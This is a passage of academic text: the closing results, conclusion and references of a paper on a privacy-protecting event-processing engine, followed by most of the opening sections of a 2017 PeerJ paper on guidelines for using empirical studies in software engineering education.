Ops={ξ, ф, ψ}, with the data flow rate the same as above. The conditional expression of ф is [>,0]. That is to say, in spite of conditional judgment, all events are permitted to pass through. According to Fig.4 (c), as ψ denies events to pass through and there is no subsequent treatment. Thus, it consumes the shortest time (only including the time consumed in event type node searching and event attribute transversing). ф has calculation of conditional judgment on its node, so it consumes more time than the benchmark ξ operation. However, they come to the same conclusion that for different operators at different input rate, the total time International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 84 consumed in processing by PSPE can still keep at millisecond level, which represents high operation efficiency. VI. CONCLUSION The experimental result shows that PSPE has a high implementation efficiency. At the same time, it is able to deal with different user roles in different ways, filtrate the event information not allowed to be accessed and generate new events in line with privacy security access control requirement. Thus, it has a feature of customizability. In addition, PSPE is completely integrated outside of CEP engine, which is very feasible because it has no influence on its original implementation structure and operation efficiency. It has certain application value by effectively making privacy security detection on the event information input/output CEP engine. ACKNOWLEDGMENT This work was supported by the Industrial research project of Science and Technology Department and the office of Education of Shaanxi Province(Grant No. 2016KTZDGY4-09, 17JZ004), and the Xi'an Technological University Principal Fund (Grant No. XAGDXJJ15015). REFERENCES [1] Luckham D. The power of events: An introduction to complex event processing in distributed enterprise systems[M]. Springer, 2008. [2] Buddhika T, Ray I, Linderman M, Jayasumana A. Secure complex event processing in a heterogeneous and dynamic network[C]. SPIE Defense+ Security, International Society for Optics and Photonics,2014:907907-907913. [3] Carminati B, Ferrari E, Tan K L. Enforcing access control over data streams[C]. Proceedings of the 12th ACM symposium on Access control models and technologies, ACM,2007:21-30. [4] Carminati B, Ferrari E, Cao J, Tan K L. A framework to enforce access control over data streams[J]. ACM Transactions on Information and System Security (TISSEC), 2010,13(3):28. [5] Tang Jin-peng, Li Ling-lin, Yang Lu-ming. User attributes oriented RBAC model[J]. Computer Engineering and Design, 2010,(10):2184-2186. [6] Xiong Hou-ren, Chen Xing-yuan, Zhang Bin, Yang Yan. Security Principles for RBAC-based Authorization Management[J]. Computer Science, 2015,42(3):117-123. [7] Jing Xin, Zhang Jing. Research on Parallel CEP Processing with the Multi-Event Pattern Shareing Capability[J]. Journal of Xi' an Technological University, 2014,34(9):715-719. work_sylvnwgcdjbulhidyf7lrawwri ---- Submitted 12 November 2015 Accepted 7 August 2017 Published 4 September 2017 Corresponding author Fabian Fagerholm, fabian.fagerholm@helsinki.fi Academic editor Perdita Stevens Additional Information and Declarations can be found on page 31 DOI 10.7717/peerj-cs.131 Copyright 2017 Fagerholm et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Guidelines for using empirical studies in software engineering education Fabian Fagerholm1,*, Marco Kuhrmann2,* and Jürgen Münch1,3,* 1 Department of Computer Science, University of Helsinki, Helsinki, Finland 2 Institute for Applied Software Systems Engineering, Clausthal University of Technology, Goslar, Germany 3 Herman Hollerith Center (HHZ), Reutlingen University, Böblingen, Germany * These authors contributed equally to this work. ABSTRACT Software engineering education is under constant pressure to provide students with industry-relevant knowledge and skills. Educators must address issues beyond exercises and theories that can be directly rehearsed in small settings. Industry training has similar requirements of relevance as companies seek to keep their workforce up to date with technological advances. Real-life software development often deals with large, software-intensive systems and is influenced by the complex effects of teamwork and distributed software development, which are hard to demonstrate in an educational environment. A way to experience such effects and to increase the relevance of software engineering education is to apply empirical studies in teaching. In this paper, we show how different types of empirical studies can be used for educational purposes in software engineering. We give examples illustrating how to utilize empirical studies, discuss challenges, and derive an initial guideline that supports teachers to include empirical studies in software engineering courses. Furthermore, we give examples that show how empirical studies contribute to high-quality learning outcomes, to student motivation, and to the awareness of the advantages of applying software engineering principles. Having awareness, experience, and understanding of the actions required, students are more likely to apply such principles under real-life constraints in their working life. Subjects Computer Education, Software Engineering Keywords Software Engineering Education, Computer Science Curricula, Teaching Methods, Empirical Studies, Experimentation, Education, Guideline INTRODUCTION Providing relevant knowledge and skills is a continuous concern in software engineering education. Students must be exposed to realistic settings to understand why applying fundamental software engineering principles is necessary, why decisions should be grounded in evidence, and to learn to foresee long-term and delayed effects of certain behaviour or decisions in software projects. Using empirical instruments is one approach to teach relevant software engineering knowledge and skills. The goal of this paper is to use our teaching experiences to develop practice-grounded guidelines that help teachers include empirical instruments in their teaching. Since real-life software development routinely deals with large, software-intensive systems and is influenced by the manifold and complex effects of teamwork and distributed How to cite this article Fagerholm et al. (2017), Guidelines for using empirical studies in software engineering education. PeerJ Comput. Sci. 3:e131; DOI 10.7717/peerj-cs.131 https://peerj.com mailto:fabian.fagerholm@helsinki.fi https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.131 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.131 software development, software engineering education must enable students to understand such environments and to apply knowledge properly and effectively. However, restrictions in the academic curriculum and the complexity and criticality of real software products limit the level of realism that can be achieved in education. As problems are narrowed down to be manageable, practical relevance is lost through scope and problem size limitations and the use of artificial settings instead of real-world problems. Many effects only become visible over long time periods, e.g., the efficiency of a particular method or eventual impact of a design decision. Often, time is too limited to provide adequate means to experience such effects in a single course. The same problem occurs in practitioner training. Industry must quickly develop solutions and services in order to deliver customer value and, eventually, survive in market competition. Empirical evidence may not be easily available, and practitioners may resort to decision-making based on by biased individual beliefs, negatively affecting the productivity of development teams. Over the years, we have implemented empirical instruments in software engineering courses to (1) provide an environment in which students can experience real-life problems while increasing their motivation and the quality of learning outcomes, (2) pave the way for conducting research in collaboration with industry, and (3) apply these instruments in industry for training purposes. In our experience, this approach has been well suited to prepare students for working life. Training in empirical instruments, such as experimentation or case study research, and direct experience of the value provided by them, has encouraged our students to apply their acquired knowledge in practice, and to explore problems, new methods, and new tools in a systematic and evidence-based manner. Since empirical instruments are well accepted for conducting (applied) research in industry, and since students can form their own experiences when doing empirical studies, we claim that utilizing empirical instruments in teaching increases the quality as well as the practical relevance of SE education. We show how different instruments, ranging from controlled experiments to qualitative studies, can be used for teaching purposes. We also consider overarching approaches that situate empirical studies in a larger context. We systematize purposes and challenges of the different study types, discuss the validity of the results that can be obtained in a teaching context, and create a link between teaching and research. We use a selection of representative studies to discuss the impact on teaching as well as on industry relevance. The guidelines developed in this paper provide a systematic collection of purposes, learning goals, challenges, and validity constraints, and aims to support teachers in selecting proper study types for inclusion into their courses. The remainder of this paper is structured as follows. ‘Related Work’ reviews related work on empirical studies as a teaching instrument. ‘Research Approach’ describes the research approach taken in this paper. ‘An Overview of Empirical Study Types for Software Engineering Education’ discusses empirical instruments in SE education and provides an initial taxonomy of them. ‘A Guideline for Integrating Empirical Studies with Software Engineering Courses’ presents the main contribution of the paper: a guideline for integrating empirical studies with software engineering courses. ‘Experiences’ gives examples of implementing empirical instruments in university education and discusses the Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 2/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 implications of integrating them into courses. ‘Conclusion’ provides conclusions and lists possible future work. RELATED WORK Experiments and other types of empirical studies are key to the scientific approach. Empirical studies are performed in research for many different purposes, such as understanding real-world phenomena, testing hypotheses, and validating theories (Wohlin et al., 2012; Runeson et al., 2012; Kitchenham, Budgen & Brereton, 2015). Empirical studies, especially experiments, are established only in few disciplines. The use of empirical studies as teaching tools is less common than, for example, classroom exercises and lectures. In many areas, such as software engineering, such utilization of empirical studies is still uncommon compared to learning tasks that involve reading or writing about existing research, and individual exercises that focus mainly on small-scale technical implementation. Empirical studies in teaching in other disciplines Physics education may be a prime example where, due to the historical development of the discipline, experiments have a central pedagogical role. Beyond their function as means for verifying or refuting theories, experiments in physics have a generative function with relevance for education and learning (Koponen & Mäntylä, 2006). While the type of problems in physics and software engineering are different, experiments play a similar role for learning in both. An example of another discipline, also different in nature from physics, that already has a high level of maturity in using experiments for teaching purposes is economics. Experiments became widespread teaching tools in economics in the 1990s (Parker, 2014). Nowadays, many economists use experiments as educational tools. Parker (2014) mentions several benefits of using experiments: they are distinctive and more participative, and in consequence, students are likely to remember lessons associated with them. Parker also mentions that the experiential component in experiments can be very important and that students and instructors usually think that experiments are fun. Experiments can be used as part of many educational approaches. For example, experiments could be used in different ways with problem-based learning (PBL) (Barrows & Tamblyn, 1980; Wood, 2003). In PBL, students define their own learning objectives connected to a problem scenario, while the tutor ensures that the objectives are ‘‘focused, achievable, comprehensive, and appropriate’’ (Wood, 2003). One possibility is to have the tutor guide students towards objectives that involve different degrees of experimentation, e.g., formulating research questions, defining research designs, or even carrying out studies with real or simulated data. The tutor may provide data as part of the problem scenario; it may be part of the trigger material provided to students. Experiments can also be used as part of project-based learning (Blumenfeld et al., 1991), where students actively explore real-world challenges and problems. Instructors can introduce experiments when important decision-making and knowledge acquisition needs emerge. In order to support the design of constructive education with experiments embedded, as well as to support experimentation within more traditional teaching, teachers would benefit from guidelines or sets of ready-made experiment templates that they could use Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 3/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 either when planning or dynamically during teaching. The SERC Portal for Pedagogy in Action, created by Ball et al. (2012), provides a repository of classroom experiments. Ball et al. define such experiments as ‘‘activities where any number of students work in groups on carefully designed guided inquiry questions’’. Students collect data through interaction with typical laboratory materials, data simulation tools, or a decision-making environment, as well as ‘‘a series of questions that lead to discovery-based learning.’’ The repository includes a comprehensive list of experiments from different disciplines that can be used for replication in classroom settings. In addition, it contains references to scientific studies that provide empirical evidence about the expected positive effects of experiments as teaching tools. An example is an empirical investigation of the impact of classroom experiments on the learning of economics (Frank, 1997). Several of the cited studies show a higher academic achievement (e.g., measured as increase in students’ homework scores) when using experiments compared to control classes where standard lectures are used. Ball et al. (2012) also cite studies that show improved student satisfaction with teaching pedagogy when using experiments. The repository also contains guidelines for designing and conducting experiments as part of teaching. The guidelines include important aspects such as strategies for unexpected outcomes of experiments. Requirements for applying empirical studies in teaching The discussion regarding the suitability of experiments mainly focuses on criteria that need to be fulfilled for designing successful experiments, the balance between practical work and theory, and the suitability of students as experimental subjects. Parker (2014) mentions basically three criteria: (1) the experiment must be aligned with the central topic of the course, (2) the concept to be taught through the experiment should not be easily understood without the experiment or already be obvious, (3) students need to be able to quickly learn the necessary prerequisites for participating in the experiment. Dillon (2008) provides an overview of advantages and disadvantages of experiments based on empirical findings. An important conclusion drawn from the overview is that successful observation of a phenomenon as part of an empirical study should not be an end in itself. Rather, students should have enough time to get familiar with the related ideas and concepts associated with the phenomenon. Empirical studies in software engineering education In software engineering, experimentation was established in the 1980s. Basili, Selby & Hutchens (1986) were among the first to present a framework and process for experimentation. Since then, software engineering experiments in classroom settings have become more common. However, the focus of most of such experiments has been to gain research knowledge, with students participating as research subjects. Less attention has been paid to using empirical studies with an educational purpose in mind, where the experiment has an explicit didactic or experiential role. Few curricula are available that include the execution of empirical studies as an integral part of a lecture (e.g., Kuhrmann, Fernández & Münch, 2013; Hayes, 2002). The use of students as experimental subjects has often been discussed in the literature. In software engineering, the topic has mainly been analysed for understanding the suitability Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 4/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 of students as subjects compared to professional practitioners as subjects. An example of such an investigation has been presented by Runeson (2003). Carver et al. (2003) note that while it is common to carry out empirical studies in software engineering with students as subjects, the educational value of the studies is often overlooked. Simultaneously, solving the pedagogical challenges involved is not straightforward. Carver et al. discuss costs and benefits for researchers, students, instructors, and industry, and provide a check-list with advice for carrying out empirical studies with student subjects. The same authors have later extended their check-list with requirements for successful empirical studies with students, based on previous literature (Carver et al., 2010). The check-list includes items addressing considerations before a class begins, as soon as it begins, when the study begins, and when the study is completed. The authors emphasise integration of the study and course topic and schedule, documentation, and considerations of study validity. Only few studies have investigated the impact on learning of empirical studies in the curriculum. We expect that the effect is generally positive as long as the integration is carried out properly. Staron (2007) finds that students’ learning process is improved and that including carefully designed experiments into software engineering courses increases their motivation. A large majority (91%) of students who participated as subjects in the experiments found them useful, and the number of high-passes increased by 41% after introducing experiments. While many articles report on empirical studies using student subjects, and some articles report on the educational benefits of such studies for students, few papers address empirical studies as an overall strategy for software engineering education. In particular, there is a lack of guidance for using empirical studies in software engineering education in cases where students may not only be research subjects but could also be involved in carrying out the studies. An overview that discusses different types of empirical studies, their suitability for education, as well as challenges with respect to their execution is missing. RESEARCH APPROACH The goal of this paper is to develop guidelines that help teachers integrate empirical instruments in software engineering education. The guidelines are based on a reflective analysis of our experiences with teaching courses that use empirical elements to support learning objectives. A reflective approach has been recognised by many educational researchers as a prerequisite for effective teaching (e.g., Hatton & Smith, 1995; Cochran- Smith, 2003; Jones & Jones, 2013). Reflective practice, with roots in the works of Dewey (1935) and Schön (1983), calls for continuous learning through deliberate reflection in and on action. Using empirical instruments in software engineering education is a way to encourage students to reflect, but teachers should do the same. This paper represents one outcome of reflection-on-action: we analyse materials, assignments, notes, course syllabi, schedules and structures, evaluation data, and recollections of important factors in a number of our own courses, and derive guidelines that we believe would help teachers implement similar courses. Our approach is mainly qualitative and has proceeded from gathering a list of study types through analysis of materials and experiences relevant to each study type to the guideline Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 5/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 proposed in this paper. Here, analysis refers to categorisation of materials and identification of connections and relationships between categories. Our main goal of developing the guideline helped to scope our investigation, and we thus left out material which did not serve this goal. We began by sifting through parts of the published literature on software engineering education and methods in order to shape a first outline of a taxonomy of study types. In particular, we were influenced by Höst (2002) and Carver et al. (2003) when considering software engineering education, and by Shull, Singer & Sjøberg (2008) and Kitchenham, Budgen & Brereton (2015) when considering the methodological aspects. Our search was purposive rather than systematic, as we sought to construct a taxonomy (see ‘An Overview of Empirical Study Types for Software Engineering Education’) for use in the guidelines rather than for the purpose of representing the state of the art in the scientific literature. After constructing the taxonomy, we analysed qualitative data from our own courses and arranged it according to five categories: (1) learning goals, purposes, challenges, and validity, (2) establishing context and goals, and determining a study type, (3) motivating students, (4) scheduling, (5) other considerations. We summarised the qualitative data in each category by removing the details specific to our courses and generalising the insights so that they can be applied more broadly. We then constructed the guideline by cross-referencing the categories so that the purpose, challenges, and validity concerns relevant for each study type is shown. The result is given in ‘A Guideline for Integrating Empirical Studies with Software Engineering Courses’. Finally, we revisited the material from our courses and picked examples that illustrate how we tackled some of the choices teachers face when using empirical instruments for education. We also addressed the specific question of evaluating our teaching by providing data from formal as well as informal evaluation (see ‘Experiences’). This serves as a first validation of the guidelines. AN OVERVIEW OF EMPIRICAL STUDY TYPES FOR SOFTWARE ENGINEERING EDUCATION The software engineering literature includes a number of empirical studies with students, and often these studies were conducted in an educational setting. In this section, we give an overview of (empirical) study types utilised in software engineering education. We list common instruments from empirical software engineering and provide examples of how these instruments can be applied to teaching. The overall goal of this section is to summarise different study types that can be used in software engineering education. The summary supports the development of an initial common taxonomy that categorises study types. The taxonomy helps to determine the appropriateness of a particular instrument in a specific setting. A concise overview of the study types, including a brief description and outline of the potential positive educational aspects, is given in Table 1. Case studies Case studies aim to investigate a phenomenon in its natural context. When utilised for educational purposes, case studies can omit some aspects of a full research design (Yin, Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 6/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 Table 1 Summary of empirical study types. Type Description Potential for education Case study Investigate phenomenon in its natural context. Especially suitable for exploratory and explana- tory designs. Results grounded in context. Gaining observational and analytic skills. Observing real scenarios with real objectives and constraints. Knowledge of high rele- vance for professional use. Formal and semi-formal experiment Investigate effect of treatment under controlled conditions. Rigorous design requirements. Re- sults constitute tests of a theory. Demonstrate the real impact of theory. Gain skills to formulate and test a theory. Continuous experimentation Constant series of experiments to test value creation, delivery, and capture of software or software-based products. Results of experiments can be used to make design decisions. Understand connection between software development and business and customer domain. Gain skills to test product assump- tions to provide evidence for product deci- sions. Software process simulation Simulation model used as abstraction of a real process. Cost and time advantages can be ob- tained. Requires a valid model. Gain understanding of process dynamics and complexity with limited resources. Ex- perience effects of decisions. Individual studies E.g., Bachelor’s or Master’s theses. Focused work on a specific problem for a limited time. Various studies are possible. Learn to conduct a study in a self-organised manner. Gain domain knowledge. Further instruments Augment or provide context for aforemen- tioned study types, e.g., replication studies, OSS projects. Provide ways to enhance other study types. 2009), but can borrow from design science methodology (Hevner et al., 2004) where an artefact is designed, implemented, and evaluated in order to learn. When performing case studies with industry, the context is provided by business objectives and realistic constraints (Brügge, Krusche & Alperowitz, 2015). Industry aims to develop results which contribute to solving a problem with relevance in their settings. For instance, developers can be trained in a close-to-reality environment, aiding the understanding of situations that will occur in the (near) future. On the other hand, researchers perform case studies to understand and capture phenomena in their natural context. Depending on the rigorousness of the study design, both practitioners and researchers benefit from a case study due to its grounding in realistic settings. Apart from ‘‘normal’’ case study research, teachers can use the case study instrument to help motivate students by providing problems with visible real-life applications. Case studies also help teachers to transmit procedural knowledge, as students are required to formulate problems and design solutions, and to evaluate them. Case studies help answering explanatory questions of the type ‘‘How?’’ or ‘‘Why?’’ They should be based on an articulated theory regarding the phenomenon of interest (Yin, 2009). A case study can then provide additional evidence for a theory, help to modify or refine a theory, or suggest an alternative theory that better fits the observations. Furthermore, a case study can also be utilized to discover (new) interesting and relevant issues. Case studies can be implemented in different ways. They can be categorized as single- or multiple-case, holistic or embedded (Wohlin et al., 2012; Runeson et al., 2012; Yin, 2009), or as intrinsic (Stake, 1995; Baxter & Jack, 2008). They can be deductive or inductive, exploratory or Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 7/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 confirmatory, and they can make use of both quantitative and qualitative data (Yin, 2009; Eisenhardt, 1989). In the context of teaching, the normal case study setup is a holistic single-case study in which a single instance of the unit of analysis (case) is examined. More complex designs, e.g., multiple-case studies, increase the value of the study results for research. However, these aspects can be considered less important for teaching. Furthermore, setting up a case study—even in teaching—requires an environment in which the phenomenon of interest occurs naturally. Case studies are a valuable source for generating diverse results. From the industry point of view, case studies help to elaborate and understand the value given by reaching the case objective, ranging from increased technological understanding to increased understanding of customer value of a product or service. They help uncover real technology- and knowledge-related challenges involved in reaching the objective and, thus, provide information on the cost, effort, and risks involved in the case. From the perspective of researchers, case studies can contribute to the development of general—but context- bound—technological rules, including case-specific insights and lessons learnt. Given replication with multiple cases, the rules can also reach the level of more general theory. Moreover, case studies can be fruitful grounds for exploration and help to discover or identify research questions. From the teaching perspective, case studies serve several purposes of which gaining observational and analytic skills are the most important. Case studies help participants to get insights into a setting in which a particular phenomenon occurs. Therefore, analysing problems and deriving tasks to solve the problem happens in real scenarios rather than synthetic situations. Solutions can be evaluated against real objectives and constraints. Consequently, this kind of learning produces knowledge of higher relevance for professional use, and teaching directly addresses subject matter and procedural knowledge related to a specific problem type. Examples of case studies in teaching Fagerholm, Oza & Münch (2013) describe the Software Factory, which is an instrument to combine software development education and training with conducting empirical research. A fruitful ground for this kind of teaching is global software development, as demonstrated by, e.g., Oza et al. (2013), Richardson, Milewski & Mullick (2006), and Deiters et al. (2011). In the Software Factory environment, students work with a company on a real software development project, providing a level of realism that is not available in a regular course exercise. This realism, along with the opportunity to work in a team setting provides the potential to conduct case studies with educational relevance. Formal and semi-formal experiments According to Wohlin et al. (2012), an experiment (controlled experiment) is defined as ‘‘an empirical inquiry that manipulates one factor or variable of the studied setting.’’ Different treatments are applied, or treatments are assigned to different subjects, to measure effects on variables of interest. If treatment is not randomly assigned, we speak of a ‘‘quasi-experiment.’’ Experiments aim to investigate settings in which the environment Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 8/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 is under control, and effects of interest are investigated by manipulating variables. For instance, if the efficiency of a particular method is subject to investigation, one experiment group is assigned to solve a problem with the ‘‘new’’ method, while another group works on the same task, but using another method. Results are then compared, e.g., to accept or reject a hypothesis. Thus, experiments can be utilised to test theories and conventional wisdom, explore relationships, to evaluate the accuracy of models, and to validate measures. Importantly, experiments should always provide a detailed context description, showing the settings in which certain claims are true, and in which certain techniques or tools are beneficial. Experiments require rigorous design. Wohlin et al. (2012) present an experiment process which consists of scoping, planning, operation, analysis and interpretation, and presentation and packaging. However, providing a general experiment design is demanding, as the design depends on the respective subject and context. Apart from the general experiment process, several smaller guidelines exist to direct researchers through the process, e.g., the goal template from the TAME project (Basili & Rombach, 1988), experimentation packages providing reusable designs, templates, and so forth (e.g., in the context of self-organizing project teams (Kuhrmann & Münch, 2016b), we created such a template; another example can be found in Fucci, Turhan & Oivo (2015)), and, pragmatically, case study designs, which can be derived from, e.g., Runeson & Höst (2009), who provide advice on planning and a guideline on reporting case study research. Experiments provide several trade-offs for the conducting parties. However, the usefulness depends on the respective context. For instance, while the importance of experiments in research is not questioned, experimentation in industry has to be considered in terms of business value (e.g., by providing new, efficient methods or creating and evaluating software prototypes, paving the way for new products). Requirements regarding the validity of the results differ as well as the general scope of experiments. Furthermore, as we have previously discussed, small and very small companies usually have insufficient resources to invest in the necessary preparation and allocation of resources (Kuhrmann, 2015). Nevertheless, experimentation allows for, e.g., evaluating different methods and tools, building a hypothesis, and testing the hypothesis. Furthermore, experiments help to confirm conventional wisdom, e.g.: ‘‘Everybody says that Follow-the-Sun development is fast but expensive—is this also true for our situation?’’. Examples of experimentation in teaching For teaching, experiments can be a valuable source for knowledge and experience. For instance, experiments can be used to elaborate the real impact of theoretical concepts: in Kuhrmann & Münch (2016b), the theoretical concept taught was the well-known Tuckman Model (Tuckman, 1965), and in a complementing experiment, students could experience the effects of group dynamics themselves, e.g., changing team set-ups or external influences. Another experiment reported in Kuhrmann & Münch (2016a) creates a setting in which students can experience the crucial role of communication (and absent communication) in distributed development set-ups. Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 9/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 In Kuhrmann, Fernandez & Knapp (2013), we present a controlled experiment on the perception of software process modelling paradigms. A German NGO sponsored a process description, which the students had to analyse and improve according to a given approach (Kuhrmann, Fernández & Münch, 2013). Students used two different process development environments, each implementing a different modelling paradigm. They went through the process life cycle, learned about analysis-, design-, and realisation tasks, and conducted result assessments. Furthermore, the experiment outcomes showed advantages and disadvantages of the particular modelling paradigms. Continuous experimentation Continuous experimentation refers to a constant series of experiments to test the value of software capabilities such as features early in its design process (Fagerholm et al., 2014a; Fagerholm et al., 2017). The major driver is the industrial need to better understand product value delivery, so that development activities can be focused on delivering only capabilities that create value for users or customers. Our experience shows that it is a mistake to ignore the value aspect in SE education, as it is a critical part of understanding software requirements. This is especially relevant in complex domains where requirements are unknown and cannot be elicited up front. In contrast to empirical software engineering that usually focuses on technical product or process aspects from a developer perspective, the purpose of continuous experimentation is to validate assumptions that are underlying a business model or a product roadmap. The perspective is usually that of a product owner or entrepreneur. Continuous experimentation is a means to evolve business models, product roadmaps, or feature scopes based on validated assumptions. It is based on approaches such as Lean Startup (Ries, 2011) and Customer Development (Blank, 2006), and enforces product managers and developers to connect with real users (e.g. through interviews or by analysing usage data) in order to test critical assumptions and make evidence-based product decisions. This typically requires, e.g., the execution of experiments in a scientific style and the implementation of feedback channels that allow observing user behaviour. For teachers, it is a great challenge to instruct students accordingly, as classic software engineering teaching is usually separated from value considerations. Thus, creating a mind-set in which value creation is the baseline for all development tasks impacts the way software development is performed in the sense that decision-making is based on continuously obtained evidence about customer value. In order to conduct continuous experimentation, different designs can be applied depending on the hypotheses or study goals under investigation. A typical design is a case study consisting of a sequence of build-measure-learn cycles that develop a so-called minimum viable product (MVP). Simply speaking, an MVP is a prototype that allows for testing with potential customers. Such testing requires a design to quickly obtain customer feedback during the study. In consequence, access to potential customers is needed to conduct such studies. From the industry perspective, continuous experimentation results in knowledge that supports or refutes assumptions about product value. An MVP might result from an experiment. Such a result might consist of a working prototype as well as data or Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 10/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 lessons learnt about the customer value of the prototype, its development process, and potentially about relevant customer segments. The study might also contribute to testing of other critical assumptions of a business model, such as assumptions about customer relationships or channels. For researchers, continuous experimentation helps to better understand processes, methods, techniques, tools, and organizational constraints regarding building the ‘‘right’’ software. From the teaching perspective, continuous experimentation helps students understand the connection between software development techniques and business. Since such experiments must begin by analysing product-related assumptions, students naturally come into contact with the product’s business model. They must then make the link between such assumptions and the corresponding technical implementation and devise an experiment which allows them to refute or support the highest-priority assumption, yielding evidence for a product-related decision. Continuous experimentation can thus foster the awareness of relevant criteria for software beyond cost, reliability, and effort, e.g., usability, usefulness, success (e.g., contribution to a higher level organizational goal), and scalability (e.g., monetization from a significant amount of users). Examples of continuous experimentation in teaching Fagerholm et al. (2014a) present building blocks for continuous experimentation and describe the execution of three student projects that aim at conducting build-measure- learn loops. These projects were performed in cooperation with a start-up and sought to understand aspects such as future development options or scalability issues of a new service. The projects helped to evolve the product roadmap and led to several technical pivots where previous assumptions were invalidated and new options found. Students gained significant insights in the connections between technical and business considerations. A process model and infrastructure architecture model for continuous experimentation are described in Fagerholm et al. (2017). Kohavi et al. (2012) describe continuous experiments from an industry perspective. The authors present a system for constant experimentation at Microsoft. They emphasize that learning addresses many aspects beyond understanding experimentation techniques. For instance, it is necessary to learn how to identify and understand the reasons for experiments in an organization. In addition, learning needs to address a change of the company culture towards experimentation. Software process simulation Experimentation is a costly way to learn. It requires, for instance, significant preparation of experimental materials and treatments. Software process simulation refers to the use of a simulation model as an abstraction of a real process. Typical purposes for using such models are experimentation, increased understanding, prediction, decision support, or education about a process. Assuming that a valid model exists, process simulation promises advantages with respect to cost. Since part of the process can be conducted virtually, the number of controlled variables can be much higher than in real experiments, and calibrating the model to a specific context can be done efficiently. Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 11/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 Simulation may be a suitable teaching aid in many situations, but should be used only when a valid model can be obtained. Otherwise, there is a risk that students observe effects that are not realistic and thus incorrect learning might occur. Well-researched models with extensive validation are necessary. Other disciplines such as mechanical engineering or molecular chemistry already use simulation to analyse technologies and processes and thereby reduce the need for real experiments. In software engineering, this trend is still focused towards product aspects such as understanding the dynamic behaviour of control software. However, simulation has already been applied successfully for understanding and analysing software processes as well as for educational purposes. Process simulation can be combined with real software engineering experiments—for example, by using empirical data to calibrate a model or by comparing such data with simulation results—or used as such. Simulation-based experiments can be classified by the number of treatments and the number of subject groups per treatment. In case of single project studies (i.e., one treatment and one group), simulation requires initialization of appropriate input parameters and calibration to the context. In case of multi-project variation (i.e., more than one treatment and one group), the simulation model needs to be calibrated to different contexts. Replications (i.e., one treatment but more than one group) basically refer to several simulation runs, typically with statistically based variations. In case of blocked subject-project studies (i.e., more than one treatment and more than one team) simulation model development requires a good understanding of cause–effect relations in varying contexts. Combining simulation with experiments can be done in the following ways: • Empirical knowledge from real experiments can be used for creating the simulation model (e.g., to calibrate the simulator) • Results from simulation runs can be used for designing real experiments (e.g., to identify and investigate new hypotheses before performing expensive real experiments) • Both can be done in parallel (e.g., to broaden the scope of the experiment). From the research perspective, software process simulation can be seen as an additional, efficient mechanism to gain knowledge about the effects of processes in different contexts. It especially allows for analysing situations that are difficult, expensive, or impossible to analyse in real experiments, and it allows for flexible variations of the context and the controlled variables. From the educational perspective, simulation helps to gain a better understanding of the dynamics of software development processes, getting immediate feedback, and experiencing the effects of decisions. Feedback can be obtained quickly using time-lapse effects. When creating the model, students gain insights into cause–effect- and other relationships. Creating a simulation model promises to improve understanding of the key factors and complexity of a specific software process. From an industry perspective, learning cycles can be accelerated, risks mitigated, and the impact of processes, technologies, and their changes can be better understood. Fagerholm et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.131 12/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.131 Examples of software process simulation in teaching Several educational software engineering simulation environments have been developed and are used for teaching purposes. Examples are the comprehensively evaluated SimSE environment (Navarro & Van der Hoek, 2007), and the SESAM (Software Engineering Simulation by Animated Models) environment (Ludewig et al., 1992). Münch, Rombach & Rus (2003) have developed a laboratory that allows to systematically combine real and virtual experiments and demonstrate the benefits of such a combination for teaching purposes. Individual studies All aforementioned study types allow for teamwork and training specific team-related skills. However, software engineering education also comprises several individual tasks, which are often performed by students while they work (for a limited time) in industry or while they write their theses (e.g., Bachelor’s or Master’s thesis, or semester projects). Although individual studies can be performed in industry-academia collaborations, they are usually conducted by individual students who work on a specific task and simultaneously perform the study. The student is thus a participant-observer in such studies. Individual studies depend on the setting in which they are carried out, e.g., requirements for a semester project differ from those of a Master’s thesis. Different study types can be applied. Individual studies have high requirements regarding the study design, as they all have limited resources and strict time constraints in common. Specific challenges are scoping the study, narrowing down research questions, and defining the expected outcome. Since individual students conduct single studies, results are often limited to proofs of concept or demonstrators. Finally, data generated in this kind of study is often isolated, requiring a defined context to which it can contribute, e.g., a more comprehensive research strategy within which a particular study investigates one small aspect. Although limited, the results of the study can have inherent value to research and practice. For research, the study may contribute to a better understanding of research questions and might be a starting point for further, more comprehensive studies. From the industry perspective, individual studies allow investigating a specific problem in a well-defined environment and, due to their limitations, analyses are limited to a specific problem. For instance, if the objective of the study is to develop an algorithm or to examine the feasibility of a specific method, a case study can be conducted explicitly focusing on this aspect, resulting in a statement which then provides rationale for further investigation. If the individual study is combined with an internship, students can summarise existing research on a topical area that can then be used as training material for company employees. Finally, when students graduate, companies may wish to employ them (they already know the student). From an educational perspective, students have to work in a self-organised manner, and they learn how to set up and conduct a problem-oriented study (including all effects, e.g., stakeholder interaction, study planning, data collection, etc.). Furthermore, students get further specific 